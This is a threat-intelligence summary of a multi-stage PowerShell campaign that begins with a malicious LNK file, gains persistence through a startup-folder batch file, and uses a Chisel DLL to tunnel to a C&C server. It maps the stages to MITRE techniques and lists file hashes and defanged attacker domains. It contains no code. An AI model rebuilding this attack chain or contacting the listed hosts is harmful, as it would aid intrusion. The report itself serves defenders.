Summary:
Cyble Research and Intelligence Lab (CRIL) has uncovered a sophisticated multi-stage infection campaign utilizing PowerShell scripts initiated by a malicious LNK file. The attack employs layered techniques to establish persistence, evade detection, and maintain communication with a command-and-control (C&C) server, ultimately enabling lateral movement within compromised networks.
Keypoints:
CRIL identified a multi-stage infection campaign using PowerShell.
The attack begins with a malicious LNK file that triggers a PowerShell script.
The first-stage script establishes persistence and downloads additional scripts.
The second-stage script maintains communication with the C&C server.
The third-stage script executes commands received from the C&C server.
A Chisel DLL was found, indicating potential use for lateral movement.
The TA likely uses a Netskope proxy for C&C communication.
The campaign employs obfuscation techniques to evade detection.
Recommendations include deploying EDR solutions and training users on phishing awareness.
MITRE Techniques
Initial Access (TA0027): Phishing (T1660): The campaign starts with a suspicious LNK file that executes a PowerShell script. The script downloads and runs malicious payloads from the C2 server.
Execution (TA0041): Command and Scripting Interpreter: PowerShell (T1059.001): The PowerShell script executes and downloads additional malicious payloads from a remote server.
Persistence (TA0028): Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001): Batch file is dropped in the startup folder.
Defense Evasion (TA0030): Obfuscated Files or Information (T1027): Use of obfuscated PowerShell scripts and tunneling tools to hide activity from traditional security mechanisms.
Command and Control (TA0037): Application Layer Protocol: Web Protocols (HTTP/S) (T1071.001): Chisel is used to create a tunnel to the C2 server, allowing further control over the infected system.
IoC:
6c7636e21311a2c5ab024599060d468e03d8975096c0eb923048ad89f372469e – SHA256 (LNK File)
8e812bb7fde8c451d2a5efc1a303f2512804f87f041b1afe2d20046d36e64830 – SHA256 (Log_29109314.ps1)
319beca16c766f5b9f8cc4ba25f0b99f1b4769d119eb74dfd694d3f49a23a5b9 – SHA256 (Log_29109318.bat)
0169283f9df2d7ba84516b3cce50d93dbb6445cc6b2201459fa8a2bc3e319ea3 – SHA256 (Log_29109317.bat)
6332d328a6ddaa8f0c1b3353ee044df18e7867d80a0558823480bd17c14a24bc – SHA256 (Chisel DLL)
hxxps://ligolo.innov-eula[.]com – Domain
hxxps://c2.innov-eula[.]com – Domain
hxxps://c2.innov-eula[.]com/feibfiuzbdofinza – URL
hxxps://credit-agricole.webdav[.]innov-eula.com – URL
Full Research: https://cyble.com/blog/dissecting-a-multi-stage-powershell-campaign-using-chisel/